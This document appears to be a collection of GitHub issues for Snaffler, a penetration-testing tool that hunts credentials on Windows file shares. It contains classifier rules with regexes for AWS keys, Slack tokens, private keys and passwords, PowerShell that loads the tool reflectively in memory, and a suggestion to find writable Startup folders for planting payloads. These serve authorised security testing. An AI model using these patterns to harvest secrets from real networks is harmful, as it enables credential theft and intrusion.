[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Disabled finding shares.
[LAB\jdoe@client1] 2023-11-08 08:11:22Z [Degub] Target path is \\server1.lab.local\DataShare01
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Parsed args successfully.
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Degub] Set verbosity level to trace.
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Creating a TreeWalker task for
[LAB\jdoe@client1] 2023-11-08 08:11:23Z [Info] Created all TreeWalker tasks.
[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Status Update:
ShareFinder Tasks Completed: 0
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 0
TreeWalker Tasks Remaining: 1
TreeWalker Tasks Running: 1
FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0
74.6MB RAM in use.

ShareScanner queue finished, rebalancing workload.
Insufficient FileScanner queue size, rebalancing workload.
Max ShareFinder Threads: 0
Max TreeWalker Threads: 21
Max FileScanner Threads: 39
Been Snafflin' for 00:05:00.0321450 and we ain't done yet...

[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Status Update:
ShareFinder Tasks Completed: 0
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 1
TreeWalker Tasks Remaining: 0
TreeWalker Tasks Running: 0
FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0
74.6MB RAM in use.

Insufficient FileScanner queue size, rebalancing workload.
Max ShareFinder Threads: 0
Max TreeWalker Threads: 22
Max FileScanner Threads: 38
Been Snafflin' for 00:05:00.0341542 and we ain't done yet...

[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Finished at 11/8/2023 8:16:23 AM
[LAB\jdoe@client1] 2023-11-08 08:16:23Z [Info] Snafflin' took 00:05:00.0341542
Snaffler out.
I snaffled 'til the snafflin was done.

The following PowerShell command and output show that it should indeed find something relevant:

PS C:\Users\jdoe> whoami
lab\jdoe
PS C:\Users\jdoe> Get-ChildItem -Recurse -Filter "*.xml" -Path \\server1.lab.local\DataShare01

    Directory: \\server1.lab.local\DataShare01\cvelistV5-main\cvelistV5-main\cves\2010\5xxx


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         11/8/2023   5:50 AM           2353 unattend.xml


    Directory: \\server1.lab.local\DataShare01\cvelistV5-main\cvelistV5-main\cves\2015\6xxx


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/18/2023   6:36 AM              0 credentials.xml
-a----         9/18/2023   6:36 AM              0 filezilla.xml

[ ... ]
PS C:\Users\jdoe> hostname
client1

Am I missing something here or is it not working as expected?

Use of escape characters in classifier WordList element

I just grabbed the latest Snaffler and noticed some changes in the new default.toml. Can you help me understand why we need to escape the file extension dot in the second rule but not the first?

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "DiscardExtExact"
MatchAction = "Discard"
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = [".bmp", ".eps", ".gif", ".ico", ".jfi", ".jfif", ".jif", ".jpe", ".jpeg", ".jpg", ".png", ".psd", ".svg", ".tif", ".tiff", ".webp", ".xcf", ".ttf", ".otf", ".lock", ".css", ".less"]
Triage = "Green"

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepExtExactBlack"
MatchAction = "Snaffle"
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = ["\\.kdbx", "\\.kdb", "\\.ppk", "\\.vmdk", "\\.vhd", "\\.vhdx", "\\.psafe3", "\\.cscfg", "\\.kwallet", "\\.tblk", "\\.ovpn", "\\.bkf", "\\.v2i", "\\.gho", "\\.vbk", "\\.tib", "\\.tibx", "\\.mtf"]
Triage = "Black"

Issue with Get-DomainDFSShareV1

Get-DomainDFSShareV1 error : System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.ThrowHelper.ThrowArgumentOutOfRangeException(ExceptionArgument argument, ExceptionResource resource)
   at System.BitConverter.ToUInt32(Byte[] value, Int32 startIndex)
   at SnaffCore.ActiveDirectory.DfsFinder.Parse_Pkt(Byte[] Pkt)
   at SnaffCore.ActiveDirectory.DfsFinder.Get_DomainDFSShareV1(DirectorySearch _directorySearch)

Not sure what is going on here. Is this a parsing issue on Snaffler's side?

Resume support

Got this error while running the new ACLCrimes branch:

Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
   at SnaffCore.Classifiers.EffectiveAccess.Win32.AuthzInitializeRemoteResourceManager(IntPtr rpcInitInfo, SafeAuthzRMHandle& authRM)
   at SnaffCore.Classifiers.EffectiveAccess.Win32.GetEffectivePermissions_AuthzInitializeResourceManager(String serverName, Boolean& remoteServerAvailable) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 479
   at SnaffCore.Classifiers.EffectiveAccess.Win32.GetEffectiveAccess(ObjectSecurity sd, IdentityReference2 identity, String serverName, Boolean& remoteServerAvailable, Exception& authzException) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 453
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 93
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.CanRw(FileSystemInfo filesysInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 39
   at Classifiers.FileResult..ctor(FileInfo fileInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\FileClassifier.cs:line 361
   at Classifiers.FileClassifier.ClassifyFile(FileInfo fileInfo) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\FileClassifier.cs:line 97
   at SnaffCore.FileScan.FileScanner.ScanFile(String file) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\FileScan\FileScanner.cs:line 26
   at SnaffCore.TreeWalk.TreeWalker.<>c__DisplayClass17_0.<WalkTree>b__0() in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\TreeWalk\TreeWalker.cs:line 45
   at System.Threading.Tasks.Task.Execute()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.Tasks.Task.ExecuteWithThreadLocal(Task& currentTaskSlot)
   at System.Threading.Tasks.Task.ExecuteEntry(Boolean bPreventDoubleExecution)
   at SnaffCore.Concurrency.LimitedConcurrencyLevelTaskScheduler.<NotifyThreadPoolOfPendingWork>b__12_0(Object _) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Concurrency\BlockingTaskScheduler.cs:line 171
   at System.Threading.QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()

No idea what caused it unfortunately.

Ultrasnaffler on .eml files

Hello, I wonder if UltraSnaffler can inspect the content of .eml files?

I wrote the following rules for .eml files but UltraSnaffler could not capture the sensitive words. I wonder if UltraSnaffler treats .eml files as plain-text files?

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
Description = "look for keywords in email files"
RuleName = "RelayPdfFiles"
MatchAction = "Relay"
RelayTargets = ["SensitiveWords"]
MatchLocation = "FileExtension"
WordListType = "Exact"
WordList = [".eml"]

[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
Description = "look for sensitive words in files"
RuleName = "SensitiveWords"
MatchAction = "Snaffle"
MatchLocation = "FileContentAsString" 
WordListType = "Contains"
WordList = ["passw","secret","thycotic","cyberark", "pw", "cred"]

Share Lister Functionality

I think there is an issue with the -a flag, which only runs the Sharefinder and shows the identified shares.
At least for me on the test domain the tool does not output many if any shares when I pass the flag.

Running the full scan does show many more shares.

If you need examples, just ask :)

Way to specify list of targets?

Hi. Thanks for the tool!
Is there a way to provide Snaffler a list of targets or a range (like 10.0.0.0/24) to look through?
I'm currently looping through -i with a script. But that feels kinda dirty.
Thanks!

Compiling Issue

I am trying to download and compile Snaffler into an exe.
I downloaded Snaffler master folder from: https://github.com/SnaffCon/Snaffler

I downloaded .NET developer framework from: https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48

I opened cmd and navigated to the snaffler-master\snaffler folder, then ran c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:snaffler.exe Snaffler.cs

Received the following results:

Microsoft (R) Visual C# Compiler version 4.8.4084.0

for C# 5

Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

Snaffler.cs(9,13): error CS0246: The type or namespace name 'SnaffleRunner' could not be found (are you missing a using

directive or an assembly reference?)

Snaffler.cs(9,40): error CS0246: The type or namespace name 'SnaffleRunner' could not be found (are you missing a using

directive or an assembly reference?)

Any and all help is appreciated.

UltraSnaffler does not quit after execution

It seems the tool keeps running when I give it a PathTarget. I see utilization in the tool for a while and output on the test path. But after a while it stops: it doesn't use any resources, but it also doesn't quit with an "I'm done" message.

Might this be caused by a config clash?

I also noticed you quadruple escape backslashes now in UltraSnaffler and some rules have additional parameters e.g.:

# Snaffler
WordList = ["\\print$", "\\ipc$"]
# vs UltraSnaffler
WordList = ["\\\\{2}print\\$", "\\\\{2}ipc\\$"]

A couple of example configurations in the repository would be awesome, as the output of -z generate includes neither comments nor unused parameters.

Separate repository of rules for snaffling

It would be great if the repository of what to snaffle was kept separate to the Snaffler tool itself. This allows people to build alternative implementations, and most importantly, update the two repositories independently (which makes it a lot easier to contribute to rules).

BytesToString() for TSV output?

This is probably a matter of personal taste, but I think that the TSV output should skip the BytesToString() translation. I assume that anyone who wants TSV output will be either consuming output with another tool or going straight to Excel. In those cases, it would be more useful to have raw digits.

Before I start a PR for this, are there reasons to keep the human-friendly format in the TSV output?

There is also a spare delimiter that needs to be removed at the beginning of the TSV template:

fileResultTemplate = Options.Separator + "{0}" + Options.Separator + "{1}"  . . . .

This results in a double-up here (between File and Red):

#[File]##Red#KeepConfigRegexRed#

I'll fix that in the same PR if the TSV item above is agreeable.

UltraSnaffler Dependencies

Heyhey!

I updated for the first time in a while and now see that UltraSnaffler is not working any more 😢

From what I see you added a local dependency, AlphaFS, from your local Group3r repo:
20cbe33

I tried cloning and compiling grouper in the same folder level where Snaffler is located, but it does not work.
Compilation errors in Group3r:
image

So I installed AlphaFS from NuGet (2.2.6) for Snaffler and UltraSnaffler in the UltraSnaffler solution and am left with the error at the bottom of this image:
image

Note. Snaffler itself compiles fine :)

Edit:
I just had a more in-depth look and it seems UltraSnaffler does not like the new way of checking permissions.
I removed all the RwStatus-related stuff and it compiles. Of course it now lacks all permission checks. 😅

Specify credentials to use

Hello.
Another feature request that I think would be handy.
I'd like to be able to run snaffler from a non-domain joined machine by specifying:

-u username -p password -d domain

Doing this allows me to easily test different users in different groups and review different sets of permissions by simply comparing the output without having to mess around with runas or proxying through something else.

Would be a very handy feature to have.

Thanks

The value '2097151' is not valid for this usage of the type FileSystemRights

[REDACTED\ss23@XXX] 2021-09-21 13:14:45Z [Error] System.ArgumentOutOfRangeException: The value '2097151' is not valid for this usage of the type FileSystemRights.
Parameter name: fileSystemRights
   at System.Security.AccessControl.FileSystemAccessRule.AccessMaskFromRights(FileSystemRights fileSystemRights, AccessControlType controlType)
   at SnaffCore.Classifiers.EffectiveAccess.EffectiveAccess.GetEffectiveAccess(FileSystemInfo item, IdentityReference2 id, String serverName) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 113
   at SnaffCore.Classifiers.EffectiveAccess.EffectivePermissions.GetEffectivePermissions(FileSystemInfo filesysInfo, String username) in Z:\tcfox On My Mac\Source\Repos\github.com\SnaffCon\Snaffler\SnaffCore\Classifiers\EffectiveAccess\EffectiveAccess.cs:line 88

No idea what is causing it :)

Some ClassifierRules shadow other ClassifierRules

It seems that I can't just add the German ClassifierRules after the default classifier ruleset, as the matching then never happens.

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "KeepGermanFilenameRegexRed"
MatchAction = "Snaffle"
Description = "Files with these file name patterns are very interesting in German companies."
MatchLocation = "FileName"
WordListType = "Regex"
MatchLength = 0
WordList = ["(Kenn|Pass)w[oö]rte?r?", "Schlüssel", "Zug[aä]ng[es]?", "T[oü]r[ -]?Code", "PINs?\\.", "Kont(o|en)", "Logindaten", "Anmeld(edaten|ung)"]
Triage = "Red"

I iterated through the rules and noticed the following rule to be the issue:

[[ClassifierRules]]
EnumerationScope = "FileEnumeration"
RuleName = "ConfigContentByExt"
MatchAction = "Relay"
RelayTarget = "KeepConfigRegexRed"
Description = "Files with these extensions will be subjected to a generic search for keys and such."
MatchLocation = "FileExtension"
WordListType = "Exact"
MatchLength = 0
WordList = ["\\.yaml", "\\.yml", "\\.toml", "\\.xml", "\\.json", "\\.config", "\\.ini", "\\.inf", "\\.cnf", "\\.conf", "\\.properties", "\\.env", "\\.dist", "\\.txt", "\\.sql", "\\.log", "\\.sqlite", "\\.sqlite3", "\\.fdb"]
Triage = "Green"
[[ClassifierRules]]
EnumerationScope = "ContentsEnumeration"
RuleName = "KeepConfigRegexRed"
MatchAction = "Snaffle"
Description = "A description of what a rule does."
MatchLocation = "FileContentAsString"
WordListType = "Regex"
MatchLength = 0
WordList = ["sqlconnectionstring\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "connectionstring\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "validationkey\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "decryptionkey\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "passwo?r?d\\s*=\\s*[\\'\\\"][^\\'\\\"]....", "CREATE (USER|LOGIN) .{0,200} (IDENTIFIED BY|WITH PASSWORD)", "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}", "aws[_\\-\\.]?key", "[_\\-\\.]?api[_\\-\\.]?key", "[_\\-\\.]oauth\\s*=", "client_secret", "secret[_\\-\\.]?(key)?\\s*=", "-----BEGIN( RSA| OPENSSH| DSA| EC| PGP)? PRIVATE KEY( BLOCK)?-----", "(\\s|\\'|\\\"|\\^|=)(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}(\\s|\\'|\\\"|$)", "NVRAM config last updated", "enable password \\.", "simple-bind authenticated encrypt"]
Triage = "Red"

Moving the German ClassifierRules above the mentioned extension rule will result in the files being discovered.

I also found out that it will find the files if I give the German test files another extension, e.g.
image

Why does the scanner stop after the first classifier matches? I think it's important to also apply the subsequent rules, as otherwise all the .txt files with juicy names will not be discovered.

Load as assembly (System.Reflection.Assembly) and Environment.Exit

When loading the .exe reflectively in a PowerShell session, e.g. like this:
$a = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\tools\Snaffler\Snaffler\bin\Release\snaffler.exe"))
$Snaffler = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($a))
[Snaffler.Snaffler]::Main("-h")
(Yes the base64 encode / decode is useless in this case, but needed in the final script)
the Environment.Exit statements exit the whole hosting PowerShell process. Any idea how to prevent this? Commenting out the statements seems to avoid that problem, but of course then the threads do not exit properly and the memory usage is extreme, until a crash occurs.

Not reading sysvol or netlogon shares

Config:

ComputerTargets = ["XXXX"]
ScanSysvol = true
ScanNetlogon = true

Output

2021-03-07 22:40:05 -05:00 [Info] Creating a sharefinder task for XXXXXX
2021-03-07 22:40:05 -05:00 [Info] Created all sharefinder tasks.
 . . . .
 
2021-03-07 22:40:35 -05:00 [Info] Status Update:
ShareFinder Tasks Completed: 1
ShareFinder Tasks Remaining: 0
ShareFinder Tasks Running: 0
TreeWalker Tasks Completed: 0
TreeWalker Tasks Remaining: 0
TreeWalker Tasks Running: 0
FileScanner Tasks Completed: 0
FileScanner Tasks Remaining: 0
FileScanner Tasks Running: 0

No SYSVOL or NETLOGON scanned.

The output directory is always C:\ with -m

Hey there, amazing tool - really great work!

One thing that has confused me is that when I use -m and provide a directory, it always seems to put interesting files in C:\ instead?

Not a big deal and I'm probably doing something wrong but curious nonetheless.

Thanks

Feature Suggestion: Easy way to scan client PCs only

Got Snaffler recommended recently and love it so far. Now I'd like to do a daytime scan of client PCs only. AFAIK the only way to scan individual hosts at the moment is to use -n and specify them one by one. Fine so far, and I guess I can squeeze all the client names into the 8,191-character limit of a command-prompt line, but there might be more comfortable options, e.g.:

  • Specify a file containing one host name per line
  • Specify one or more OUs to use for computer account enumeration
  • Specify a name pattern for the computer accounts to be included in the scan

Edit: I just found out via -z generate that it is possible to set a custom ComputerTargetsLdapFilter if you specify an options file. I'll try this; it looks like a good way to achieve some of what I have in mind.
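
For reference, a filter of roughly this shape is what I have in mind (standard LDAP syntax, nothing Snaffler-specific). The snippet below just shows what such a filter selects, using System.DirectoryServices; I haven't checked exactly how Snaffler combines ComputerTargetsLdapFilter with its own defaults:

using System;
using System.DirectoryServices;   // Windows only; needs a reference to System.DirectoryServices

class ClientPcEnumDemo
{
    static void Main()
    {
        // Enabled computer accounts whose operatingSystem attribute doesn't look like a server.
        string ldapFilter =
            "(&(objectCategory=computer)" +
            "(!(operatingSystem=*server*))" +
            "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))";   // bit 2 = account disabled

        using var searcher = new DirectorySearcher   // default SearchRoot = current domain
        {
            Filter = ldapFilter,
            PageSize = 500,   // paged search so large domains come back completely
        };
        searcher.PropertiesToLoad.Add("dNSHostName");

        foreach (SearchResult result in searcher.FindAll())
        {
            if (result.Properties["dNSHostName"].Count > 0)
                Console.WriteLine(result.Properties["dNSHostName"][0]);
        }
    }
}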

Deduplicate findings

It sometimes happens that the exact same result appears several times in the output log (at least in the log file; I don't use the stdout output much).

Example of duplicated output:

[xxx@xxx] 2022-02-15 11:37:56Z [File] {Black}<KeepExtExactBlack|R|^\.kdbx$|2,7kB|2022-02-10 16:38:21Z>(\\toto\share\KEEPASS\user.kdbx) .kdbx
[xxx@xxx] 2022-02-15 11:47:18Z [File] {Black}<KeepExtExactBlack|R|^\.kdbx$|2,7kB|2022-02-10 16:38:21Z>(\\toto\share\KEEPASS\user.kdbx) .kdbx

Maybe this is related to several workers finding the same thing, I don't know. However, this is quite a problem on big networks because it can make the log twice its normal length and a lot longer to read.

Some deduplication mechanism could be implemented either before writing the log entry or at the end before closing the file.
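
Something as simple as keying on rule name plus full path would catch the example above. A minimal sketch, not tied to Snaffler's internals (the type names here are made up):

using System;
using System.Collections.Generic;

// Minimal illustration of suppressing duplicate findings before they reach the log writer.
class FindingDeduper
{
    private readonly HashSet<string> _seen = new(StringComparer.OrdinalIgnoreCase);

    // Returns true the first time a (rule, path) pair is seen, false for repeats.
    public bool IsNew(string ruleName, string filePath)
        => _seen.Add(ruleName + "|" + filePath);
}

class Demo
{
    static void Main()
    {
        var dedup = new FindingDeduper();
        string[][] findings =
        {
            new[] { "KeepExtExactBlack", @"\\toto\share\KEEPASS\user.kdbx" },
            new[] { "KeepExtExactBlack", @"\\toto\share\KEEPASS\user.kdbx" },   // repeat from a second worker
        };

        foreach (var f in findings)
        {
            if (dedup.IsNew(f[0], f[1]))
                Console.WriteLine("[File] " + f[0] + " " + f[1]);
            // else: silently drop the repeat
        }
    }
}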

Discard Rules not obeyed

The new rule folders and TOML files are nice. I wonder, though, how the order is determined.
I tested the branch and noticed that PathRules\Discard\DiscardWinSystemDirs.toml is ignored, for example.
Maybe it matches, but not early enough. Is there logic that checks all discard rules before the keeper rules?
At least, this happens here with a patched, self-compiled UltraSnaffler build.


I see at least this, which suggests the intended order:

public enum MatchAction
{
    Discard,
    SendToNextScope,
    Snaffle,
    Relay,
    CheckForKeys,
    EnterArchive
}

Same issue on Snaffler without Ultra.

Originally posted by @cmprmsd in #78 (comment)

I'm looking into it a bit, and it seems the dirResult object is correctly set to ScanDir = false.
But the snaffling part ignores it:

I added the following to ClassifyDir:

case MatchAction.Discard:
    dirResult.ScanDir = false;
    Mq.Info("Scan: " + dirResult.ScanDir.ToString() + " " + dirResult.DirPath.ToString());
    return dirResult;

The output shows that the directory is still being searched:

2022-02-26 12:42:55Z	[Info]	Scan: False C:\Windows\System32\de-DE
[File]	Green	KeepNameContainsGreen	R			passw	3584	2019-12-07 14:51:01Z	C:\Windows\System32\de-DE\PasswordOnWakeSettingFlyout.exe.mui	PasswordOnWakeSettingFlyout.exe.mui
[File]	Green	KeepNameContainsGreen	R			passw	4608	2019-12-07 14:50:59Z	C:\Windows\System32\de-DE\PasswordEnrollmentManager.dll.mui	PasswordEnrollmentManager.dll.mui

I also added some debugging to WalkTree, and the function seems to be called twice:

02-26 14:30:19Z	[Info]	Scan in WalkTree: True C:\Windows\System32\de-DE\Licenses
02-26 14:30:31Z	[Info]	Scan: False C:\Windows\System32\de-DE\Licenses
02-26 14:30:31Z	[Info]	Scan in WalkTree: False C:\Windows\System32\de-DE\Licenses
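
For what it's worth, the guard I'd expect looks roughly like this: ScanDir gets checked before any files are queued or subdirectories entered. This is a compilable sketch only; DirResult, ClassifyDir and ScanFile are stand-ins, not Snaffler's real types:

using System;
using System.IO;

class TreeWalkSketch
{
    class DirResult
    {
        public bool ScanDir { get; set; } = true;
        public string DirPath { get; set; } = "";
    }

    static DirResult ClassifyDir(string dirPath) =>
        new DirResult
        {
            DirPath = dirPath,
            // Stand-in for the Discard path rules (e.g. DiscardWinSystemDirs.toml):
            ScanDir = !dirPath.StartsWith(@"C:\Windows\System32", StringComparison.OrdinalIgnoreCase),
        };

    static void ScanFile(string filePath) => Console.WriteLine("scanning " + filePath);

    static void WalkTree(string dirPath)
    {
        DirResult dirResult = ClassifyDir(dirPath);
        if (!dirResult.ScanDir)
            return;   // Discard matched: skip this directory's files AND its whole subtree.

        foreach (string file in Directory.EnumerateFiles(dirPath))
            ScanFile(file);

        foreach (string subDir in Directory.EnumerateDirectories(dirPath))
            WalkTree(subDir);
    }

    // The directory from the output above gets pruned immediately, so nothing is printed.
    static void Main() => WalkTree(@"C:\Windows\System32\de-DE");
}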

Checking for write permissions?

Hi there.
I have a feature request: would it be possible to also check whether the user running Snaffler has write permissions?

Ideally just looking at the top-level share (rather than every folder beneath it in the share).

Output something like:
2021-06-07 11:14:11 +10:00 [Share-Writeable] {Yellow}(\\server.fqdn.local\writableshare)

Would be suuuuper helpful.
Thanks!
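
In case a sketch helps: the crude way to approximate this is to try creating (and immediately deleting) a uniquely named zero-byte file in the share root, which reflects effective share plus NTFS permissions without resolving ACLs. The share name below is just the example from above:

using System;
using System.IO;

class WriteCheckSketch
{
    static bool CanWrite(string shareRoot)
    {
        string probe = Path.Combine(shareRoot, "." + Guid.NewGuid().ToString("N") + ".tmp");
        try
        {
            using (File.Create(probe)) { }   // zero-byte probe file
            File.Delete(probe);
            return true;
        }
        catch (UnauthorizedAccessException) { return false; }
        catch (IOException) { return false; }
    }

    static void Main()
    {
        string share = @"\\server.fqdn.local\writableshare";   // example share from above
        string tag = CanWrite(share) ? "[Share-Writeable]" : "[Share-ReadOnly]";
        Console.WriteLine($"{DateTime.Now:yyyy-MM-dd HH:mm:ss zzz} {tag} {{Yellow}}({share})");
    }
}

Reading the DACL instead would be quieter, but resolving effective access from the share ACL plus the NTFS ACL is fiddly, which is probably why the try-create approach is so common.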

Permission Checking and rules for it

Hey l0ss!

I think we forgot to open a new issue for the permission checks discussed in #84.
I just noticed that the permissions are still hardcoded and thought it might be worth a shot to get this done.

You mentioned a better way that you worked on in group3r. I'll have a look at it if I find some spare time.

Going forward, it would make sense to have rules that identify write access to folders like the Windows Startup folder, so some evil stuff can be placed in them during engagements.
We could also brainstorm other folders that might be critical, like wwwroot or /var/www.

Have a great weekend!

Support for CSV export

Hi @l0ss and @Sh3r4 ,

First off, thank you for creating such a fantastic tool! I've used it on multiple assessments now, and it has consistently found troves of credentials, secrets, or other sensitive bits of information that would have otherwise led to a significant compromise.

I wanted to ask if you have any plans to support CSV exports from Snaffler? If not, is there a strongly typed JSON schema available so that JSON output can be reliably parsed and processed?
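
In the meantime, one possible workaround is to post-process the -y (TSV) output into CSV with RFC 4180-style quoting. A sketch, assuming genuine tab separators and one finding per line; the file names are placeholders:

using System;
using System.IO;
using System.Linq;

// Convert tab-separated Snaffler output to CSV by quoting every field.
class TsvToCsv
{
    static string CsvEscape(string field) =>
        "\"" + field.Replace("\"", "\"\"") + "\"";

    static void Main(string[] args)
    {
        string inPath  = args.Length > 0 ? args[0] : "snaffler.tsv";   // placeholder names
        string outPath = args.Length > 1 ? args[1] : "snaffler.csv";

        var csvLines = File.ReadLines(inPath)
            .Select(line => string.Join(",", line.Split('\t').Select(CsvEscape)));

        File.WriteAllLines(outPath, csvLines);
    }
}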

Rules to look for VPN Creds

Unfortunately, I frequently find VPN creds in txt/docx/xlsx files. I think rules to find these files would be helpful.

I can work on the rules; I just wanted to know your thoughts.
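
A few content patterns that seem worth starting from: OpenVPN inline auth-user-pass directives, IPsec/strongSwan pre-shared keys, and Cisco .pcf profile passwords. Sketched here as C# regexes purely to show the shapes; they would ultimately live in a rule's WordList, and they are untested suggestions rather than anything official:

using System;
using System.Text.RegularExpressions;

class VpnRegexIdeas
{
    // Candidate content regexes for VPN credential material; a starting point only.
    static readonly (string Name, Regex Pattern)[] Rules =
    {
        ("OpenVPN inline creds", new Regex(@"^\s*auth-user-pass(\s+\S+)?\s*$",
                                           RegexOptions.IgnoreCase | RegexOptions.Multiline)),
        ("IPsec/strongSwan PSK", new Regex(@"\bpre-?shared-?key\b|\bPSK\s*[:=]",
                                           RegexOptions.IgnoreCase)),
        ("Cisco .pcf group pwd", new Regex(@"^(enc_)?(GroupPwd|UserPassword)\s*=",
                                           RegexOptions.IgnoreCase | RegexOptions.Multiline)),
        ("Generic vpn password", new Regex(@"vpn.{0,20}passw(or)?d\s*[:=]",
                                           RegexOptions.IgnoreCase)),
    };

    static void Main()
    {
        string sample = "enc_GroupPwd=ABCDEF0123456789";   // typical line from a Cisco .pcf profile
        foreach (var (name, pattern) in Rules)
            if (pattern.IsMatch(sample))
                Console.WriteLine("hit: " + name);
    }
}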

Case Sensitive Matching

Hi! :)
I noticed during my tests that the matching is always case-insensitive, as described in your README.

When we want to match certain words in regex rules, e.g. PINs?, it also matches many other words, e.g.:

  • mmcsnapins
  • igxpin.exe
  • colorschememapping.xml
  • SnapIn.dll
  • mdmpin.inf
  • mdmpin.PNF
  • EmpInv.xml

and many more. This could be ruled out (hoho) with case-sensitive matching, which would drastically reduce false positives.

Since I have already identified several interesting files via the PIN match, I would not want to drop the keyword as a whole.
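
To make the effect concrete, here is a tiny comparison using the PINs? pattern and some of the names above (pins.txt is from my test output; WLAN-PIN.docx is an invented example of a legitimate hit). Note that with case-sensitive matching the all-lower-case pins.txt would be missed too, so it cuts both ways:

using System;
using System.Text.RegularExpressions;

class CaseSensitivityDemo
{
    static void Main()
    {
        string[] names =
        {
            "mmcsnapins", "igxpin.exe", "colorschememapping.xml",
            "SnapIn.dll", "mdmpin.inf",
            "pins.txt", "WLAN-PIN.docx",
        };

        var insensitive = new Regex(@"PINs?", RegexOptions.IgnoreCase);
        var sensitive   = new Regex(@"PINs?");   // upper-case only

        foreach (string name in names)
        {
            Console.WriteLine($"{name,-28} insensitive={insensitive.IsMatch(name),-5} sensitive={sensitive.IsMatch(name)}");
        }
    }
}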

I hope the detailed feedback and many issues are okay and Snaffler won't murder me. 🔪

TSV output is spaced instead of tabbed

The TSV output is actually SSV (spaced 🗡️ )

[host] 2021-08-16 13:07:19Z [File] Green KeepNameContainsGreen R W passw 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt passwort.txt
[host] 2021-08-16 13:07:19Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 10:50:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine logindaten.imagine
[host] 2021-08-16 13:07:19Z [File] Red KeepConfigRegexRed R W simple-bind authenticated encrypt 33 2021-08-16 10:43:52Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml simple-bind authenticated encrypt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Anmeld(edaten|ung) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldung.txt anmeldung.txt
